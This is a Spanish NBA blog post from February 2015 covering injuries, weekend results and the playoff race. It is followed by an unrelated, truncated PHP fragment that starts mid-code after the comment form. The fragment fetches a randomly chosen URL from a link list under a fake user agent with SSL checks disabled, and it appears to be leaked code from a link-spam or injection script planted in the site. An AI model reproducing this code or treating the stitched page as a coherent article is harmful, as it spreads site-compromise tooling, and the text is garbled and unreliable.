Informe del fin de semana: Recolocación

23 de February de 2015 por TheDeerHunter

Las jornadas que siguen al All-Star y a la fecha límite de traspasos resultan extrañas: Jugadores que acaban de llegar a sus nuevos equipos, otros que ven como su rol cambia, otros que todavía están de vacaciones… Además este fin de semana hemos recibido un par de malas noticias. Por un lado la más grave: la baja de Chris Bosh para lo que resta de campaña al detectársele coágulos en el pulmón. Por el otro, la baja de Jared Sullinger también hasta final de temporada con problemas en el pie izquierdo. Para más inri, Anthony Davis se ha resentido de su lesión en el hombro y Kevin Durant estará unos días de baja tras pasar por el quirófano para tratar problemas menores en un pie derecho. La lista de jugadores tocados es interminable y aunque lo decimos todos los años, tal vez empieza a ser hora de que la NBA tome cartas en el asunto.

De todas maneras la liga sigue. Los Cavs continúan en modo avión, al igual que los Thunder que ya están cómodamente instalados en la octava posición. Se presentan unas jornadas muy interesantes para acabar de dilucidar las series de primera ronda de playoffs. Como todos sabíamos, en el Oeste serán espectaculares.

El viernes los Golden State Warriors reforzaron su liderato gracias a su convincente victoria ante los campeones y la derrota en su propia casa de unos Hawks que se quedaron en 80 puntos ante los Raptors. Además dos de sus perseguidores en el Oeste también tropezaron, los Rockets en Dallas y los Blazers en una actuación horrorosa en Salt Lake. No fue la mejor manera de honrar la memoria de Kersey.

“Esperando ver un partido igualado y vaya repaso de los Cavaliers a los Wizards, 38 puntos de renta y jugando en el Verizon.”Ruxixón

Con su sobrado triunfo los Cavs pasaron en la clasificación a Washington y alcanzaron a los Bulls, que cayeron en Detroit. Los 28 puntos de LeBron James llegaron en tan sólo 25 minutos en pista.
Otro protagonista de la noche fue DeMarcus Cousins, haciendo el animal ante los Celtics para regar con una victoria el debut de George Karl.

En el resto de la jornada, los Pelicans tropezaron en Orlando; Rodney Stuckey fue el mejor de los Pacers saliendo desde el banco para doblegar a los Sixers, y Shabazz Napier y Hassan Whiteside lideraron a los Heat ante Knicks. Phoenix y Milwaukee corrieron diferente suerte a pesar de no contar ninguno de los dos con sus flamantes incorporaciones de mitad de temporada: los Suns no pudieron con los Wolves mientras que los Bucks ganaron a Denver.

El sábado, Rusell Westbrook siguió en modo depredador  y los Thunder se impusieron a los Bobcats pesar de no contar con Kevun Durant. En cambio, los Raptors tiraron por la borda la machada del día anterior con una actuación deprimente ante unos Rockets liderados en esta ocasión por Corey Brewer. Pau Gasol fue clave en la apurada victoria de los Bulls ante unos Suns en los que ya debutó Brandon Knight y los Clippers destrozaron a los Kings con un partidazo de la dupla JJ RedickAustin Rivers. Éste último cerrando muchas bocas.

Y en Miami…

“Se prestan los Pelicans por eso de ser de una ciudad con tanta vinculación con el vudú y esas cosas a pensar que les han echado un mal de ojo.En el momento álgido de la temporada,cuando Oklahoma ha puesto velocidad de crucero y hay que aguantar como sea,se lesionan Davis en su hombro y Ryan Anderson en la rodilla.Ganaron gracias a un renacido Eric Gordon y con la buena actitud de Cole ante su equipo hace unas pocas horas,pero vaya precio han pagado. A ver la gravedad de ambas lesiones.” Ruxixón

Poco antes de iniciarse la jornada del domingo conocíamos que Stephen Curry sería baja por molestias en su tobillo derecho y horas después se consumaba la derrota de los suyos en Indianápolis. Rodney Stuckey se convirtió en el primer jugador de la historia de los Pacers es anotar más de 30 puntos en dos partidos consecutivos saliendo desde el banco. La derrota de los líderes la aprovecharon los Grizzlies para recortar distancias. Los de Marc Gasol empesaron el último cuarto 13 puntos abajo pero fueron capaces de remontar a domicilio y ya están a 3 victorias y media del liderato.Dallas y Oklahoma City también ganaron, los primeros a unos Hornets que encadenan 5 derrotas consecutivas y se hunden en la clasificación. Los segundos a unos Nuggets que ya llevan hundidos un tiempo.

En el Este, victoria de trámite de los Cavs ante los D-league Knicks y victoria trabajadísima de los Hawks en Milwaukee. Los Wizards, en cambio, cayeron ante unos Pistons que están a medio pasito de los PO.  Los Celtics cayeron en la prórroga ante los Lakers. Ahora mismo, desde la séptima posición de los Heat hasta la décimo segunda posición de los Celtics hay sólo 2 victorias y media de diferencia. Va a estar interesante (que no bonita) la lucha por esa dos plazas de Playoffs.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>